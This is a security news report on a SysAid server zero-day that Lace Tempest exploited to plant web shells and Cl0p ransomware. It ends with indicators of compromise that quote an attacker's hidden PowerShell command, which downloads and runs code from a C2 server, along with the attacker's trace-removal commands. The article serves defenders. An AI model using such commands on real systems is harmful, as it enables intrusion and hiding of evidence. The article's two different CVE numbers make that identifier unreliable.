As previously reported, SysAid disclosed a zero-day issue affecting on-premises SysAid servers. The vulnerability was found to be a path traversal vulnerability and was given CVE-2023-47426.
Additionally, SysAid stated that there were reports of Lace Tempest exploiting the vulnerability in the wild.
Moreover, Microsoft Threat Intelligence Team analysis mentioned that the Lace Tempest threat actor has exploited this vulnerability to deploy Cl0p ransomware on affected systems.
This threat actor is the same who exploited MOVEit Transfer applications and GoAnywhere MFT extortion attacks.
According to the reports shared with Cyber Security News, Rapid7 has been analyzing this vulnerability on SysAid servers. SysAid’s security advisory mentioned that the threat actor used this vulnerability to upload a WAR archive consisting of WebShell and other payloads.
These were uploaded to the root of SysAid’s Tomcat web service as part of exploitation. It was also reported that the threat actors used three processes, spoolsv.exe, msiexec.exe, and svchost.exe, for exploitation purposes.
However, post-exploitation was done by deploying the MeshAgent remote administration tool and GraceWire malware on the affected devices.
SysAid claims to have 5000 customers and has been proactively communicating with them for mitigation steps. SysAid has also released patches to fix these vulnerabilities.
StorageGuard scans, detects, and fixes security misconfigurations and vulnerabilities across hundreds of storage and backup devices.
CVE-2023-47246, which exists in SysAid On-premises servers, can be fixed in version 23.3.36. Customers of SysAid servers are recommended to apply the necessary patches as a priority to prevent threat actors from exploiting the weaknesses on the servers.
Indicators of Compromise
|Meshagent.exe||2035a69bc847dbad3b169cc74eb43fc9e6a0b6e50f0bbad068722943a71a4cca||Meshagent.exe remote admin tool|
|81.19.138[.]52||GraceWire Loader C2|
|45.182.189[.]100||GraceWire Loader C2|
|179.60.150[.]34||Cobalt Strike C2|
|45.155.37[.]105||Meshagent remote admin tool (C2)|
|C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.war||Archive of WebShells and tools used by the attacker|
|C:\Program Files\SysAidServer\tomcat\webapps\leave||Used as a flag for the attacker scripts during execution|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(‘http://179.60.150[.]34:80/a’)
Remove-Item -Path “$tomcat_dir\webapps\usersfiles\leave”.
Remove-Item -Force “$wapps\usersfiles.war”.
Remove-Item -Force “$wapps\usersfiles\user.*”.
Patch Manager Plus, the one-stop solution for automated updates of over 850 third-party applications: Try Free Trial.